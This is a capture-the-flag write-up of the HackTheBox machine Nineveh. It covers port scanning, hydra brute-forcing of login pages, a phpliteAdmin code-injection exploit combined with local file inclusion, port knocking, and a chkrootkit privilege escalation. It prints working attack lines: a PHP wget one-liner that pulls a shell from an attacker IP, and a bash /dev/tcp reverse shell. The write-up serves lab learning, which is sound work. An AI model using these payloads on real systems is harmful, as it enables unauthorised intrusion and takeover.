HacktheBox - Nineveh Writeup

03/12/2019

Zero to OSCP Hero Writeup #15 - Nineveh 

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.43

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

So from the scan we see that only ports 80 and 443 are open, we can also see that there is domain name for the box too, ninemeh.htb, we can add this to our /etc/hosts file. 

1.1. Add domain name to /etc/hosts file 

nano /etc/hosts 

10.10.10.43     nineveh.htb

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.43

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no addional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.43

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80 

1. Browse to https://nineveh.htb 

When we browse to https://nineveh.htb, we get a default web page:

When we check the page source code, there is a comment in there from a user called amrois, to another user, admin: 

2. Check for hidden directories 

As there is not much to go off here, lets see if there are any hidden directories with gobuster: 

gobuster dir -u https://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

2.1 Check the hidden directory, /department

After browsing to https://nineveh.htb/department we see that it directs us to a login page. 

After checking for potential SQL injection with sqlmap, it seems that the login page isnt vulerable to it, although there is a flaw with the login page as it will show you a different error message when inputting invalid and valid usernames from the database: 

Invalid Username (entering the username: username): 

Valid Username (Entering the username: admin):

With this flaw, we are able to detemine valid usernames by taking note of the error message. 

3. Testing potential passwords for the admin user

As we know that admin is a valid user, im going to use hydra to try potential passwords and see if we can get valid credentials by bruteforcing the login page: 

hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V

And we found valid admin credentials! 

admin:1q2w3e4r5t

4. Login to the department login page

After logging in, we are greeted with a under contruction image: 

And when we click on the notes tab, we are greeted with these notes: 

There doesnt seem to be much else to check through on port 80, lets now move onto port 443!

Enumerating Port 443

1. Browse to https://nineveh.htb 

Again, we are greeted with just an image with no other information. 

2. Check for hidden directories

As there is only an image on the main page, lets see if there are any hidden directories with gobuster:

gobuster dir -k -u https://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

Note that we have added the -k flag, this is needed when testing via https to bypass the X509 certification errors. 

So there are a couple of interesting directories, /db and /secure_notes, lets check out /db first. 

2.1 Checking the hidden directory /db

After browsing the https://nineveh.htb/db we find ourselves at another login page, this time its for the application, phpliteAdmin v1.9

3. Searching for phpliteAdmin 1.9 exploits 

Lets see if there are any exploits for this version of phpliteAdmin with searchsploit:

searchsploit phpliteadmin 1.9 

The top exploit seems interesting, lets look at it in more detail: 

searchsploit -x exploits/php/webapps/24044.txt 

So the exploit requires us to create/change databases, meaning we need to be authenticated!

4. Bruteforcing phpliteAdmin login 

Lets again utilise hydra to bruteforce the login for phpliteAdmin: 

hydra 10.10.10.43 -l anything -P /usr/share/seclists/Passwords/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443

As the phpliteAdmin login form only requires a password, we can use any username we wish for the -l flag. 

To find the required parameters needed for the hydra command, we can see them by capturing a burp login request: 

And again, rockyou.txt has the valid password... Password123

Initial Foothold - User

1. Log in to phpliteAdmin

Now that we have the valid password, we can now login to phpliteAdmin:

2. Follow the POC of the PHP remote code injection exploit

Lets follow the POC for the exploit: https://www.exploit-db.com/exploits/24044

2.1 Create new database 

Im going to create a new database, ninevehNotes.php, the reason for calling the database this will become clear in just a sec: 

Once it is created, we see the exact path to the created database: /var/tmp/<db> 

3. Create a new table in the pathtoroot.php database

To add a one liner command that will call back to our attacker machine and download a shell script, we need to create a table. We will call the table, table.

3.1 Add php one liner to the table

We now need to changed the type from INTERGER to TEXT and add a php one liner to the table in the Default Value field. which will download our php reverse shell script file: 

<?php system("wget https://10.10.14.59:8080/shell.php -O /var/tmp/shell.php); ?>

3.2 Create shell.php file from kali php reverse shell

Okay, now we need to use the trusty php reverse shell file that comes with kali and rename it to shell.php and change the IP and Port for the connection:

3.3 Start python webserver 

Once the shell.php file has been created, we now need to start a webserver so the machine can download it: 

python -m SimpleHTTPServer 8080

3.4 Start Netcat listener 

... and Start a netcat listener to capture the connection from the machine once it executes the shell.php file. 

nc -lvnp 9001

4. Browse to the created database

We are all set now to have the machine download our shell.php file. The location we are using for this is back on port 80 via the notes page. 

On the notes page, the URL showed a potential LFI: 

?notes=file/ninevehNotes.txt 

We will exploit this by entering /var/tmp/ninevehNotes.php instead of file/ninevehNotes.txt:  

https://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php

We get a connection to our netcat listener as www-data! 

Even though we are on the machine, we still dont have access to the user.txt file as we are only on the machine as www-data.

5. Make our shell fully interactive

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

6. Taking a look at the secure_notes directory

After I couldnt find anything of interest after a brief look around the usual priv esc methods, i went back to my initial enumeration of the directories and remembered the secure_notes directory. 

Lets go back to it, and save the image to our attacker machine. 

6.1 Running Binwalk on the image

I'm going to run binwalk on the image to see if there is anything hidden inside the image file. 

binwalk nineveh.png 

Aha. The output shows that there is a compressed zlib folder inside the image.

Lets run binwalk again, but with the -Me flag. This extracts all the contents inside of the image file. 

binwalk -Me nineveh.png 

Lets see what contents were found in the image through the directory created by binwalk, _nineveh.png.extracted: 

We see that there is a folder called 'secret', this contains an RSA private key!  

7. Running Netstat 

We may have the private key which we could use with SSH, but remember from our nmap scan, Port 22/SSH was not open. 

Lets instead check locally using netstat:

netstat -aunt |grep LISTEN

So Port 22 which is used by SSH is listening on the machine! The reason  for the nmap scan not finding port 22 open is down to the rules in the /etc/iptables/rules.v4 file: 

As you can see, any tcp scan packets on any port other than 80 or 443 will be dropped. 

8. Port Knocking to allow external SSH access

Port knocking is the method used to grant remote access without leaving a port open constantly. This protects the identity of such a port being used from port scanning, as we have seen! 

To use port knocking, the server must have a firewall and run the knock-daemon, /etc/knockd. Simply, the daemon is listening for a specific sequence of TCP or UDP packets, if the sequence of packets is correct, then usually the source IP address of the port knocking is given access through the firewall to the assigned knocking port. 

8.1 Check the /etc/knockd.conf file 

Inside the knockd.conf file, will have the correct knock sequence needed to open the SSH port 22: 

cat /etc/knockd.conf 

As you can see, for Port 22 to open, we need to send tcp packets to port 571, 290 and 911. 

8.2 Creating a for loop to open Port 22

I created this for loop that will send packets to the sequence ports which should then give us SSH access, lets give it a go: 

for i in 571 290 911; do nmap -Pn  --max-retries 0 -p $i 10.10.10.43; done

8.3 Confirm Port 22 is now open

We can run a basic nmap port scan to check if port 22 is now open: 

nmap -p 22 10.10.10.43 

Bingo! :D 

9. Use RSA Private Key to login as amoris via SSH

Lets now try and login with the found private key: 

chmod 600 nineveh.priv

ssh amoris@10.10.10.43 -i nineveh.priv

10. Grab the user.txt flag 

cat user.txt 

Privilege Escalation - Root 

1. Running LinEnum.sh 

I downloaded LinEnum to the machine using python webserver and wget to download the LinEnum.sh file. 

Make the script executable then run it: 

chmod +x LinEnum.sh

./LinEnum.sh 

1.1 Out of place crontab 

Going through the linenum output, i found a crontab that seemed interesting: 

2. Checking contents of report-reset.sh 

Okay, so the cron executes this script that removes any files with the .txt extension from a directory called /report

3. Checking the /report directory

Lets find the report directory and see what contents it holds: 

cd /report/

ls -l

Okay, so it seems that a report is created every minute, probably via a cronjob, lets see what one of the reports has inside: 

cat report-19-11-28:22:49.txt

Okay, so as you can see from the sample of the report above shows, its seems to be checking files for infections by rootkits. After a google, it seems that these reports are from a rootkit checker called chkrootkit. 

We were able to confirm this by checking to see if chkrootkit was on the machine: 

locate chkrootkit

4. Checking for chkrootkit vulnerabilities 

Lets check searchsploit to see if there are any exploits for chkrootkit:

searchsploit chkrootkit

So it seems that chkrootkit is our way to root by exploiting a local priv esc exploit! 

5. chkrootkit Local Priv Esc Exploit 

Lets take a more detailed look at the exploit: 

searchsploit -x exploits/linux/local/33899.txt

Pretty simple exploit- add a reverse shell file in the /tmp folder and call it update! 

5.1 Create bash reverse shell one liner file and call it 'update'

i'm going to utilise the pentest monkey reverse shell cheat sheet and use a bash one liner: 

cd /tmp

nano update

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.59/9002 0>&1

5.2 Start netcat listener

Now we need to start a listener to capture the connection: 

nc -lvnp 9002 

We now have a connection from chkrootkit as root! 

6. Grab root.txt 

cat root.txt 

Conclusion

Wow that was a long writeup! if youre still reading this, kudos to you! Dont forget to like, retweet and comment on the writeup via my twitter @CraigUnder 


Next up is Box #16 - Grandpa!